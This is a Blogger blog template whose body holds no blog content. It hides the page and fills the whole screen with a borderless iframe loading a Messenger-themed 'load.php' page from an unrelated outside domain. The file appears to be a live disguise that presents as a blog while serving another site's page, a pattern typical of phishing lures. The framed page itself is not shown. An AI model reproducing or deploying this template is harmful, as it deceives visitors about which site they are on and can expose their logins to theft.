<?xml version='1.0' encoding='UTF-8' ?>
    <html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
    <head><meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
    <b:skin><![CDATA[body{overflow:hidden}]]></b:skin>
    <meta content='width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0' name='viewport'/>
    <title><data:blog.pageTitle/></title></head>
    <body><b:section id='hell'/>
    <iframe allowfullscreen='' frameborder='0' height='100%' src='https://iremuyar.com/tempo/Messenger/load.php?ds=85997' style='border:0px #ffffff none;' width='100%'/>
    <script async='true' src='https://resources.blogblog.com/blogblog/data/res/4268249124-indie_compiled.js' type='text/javascript'/>
        <script></script></body></html>

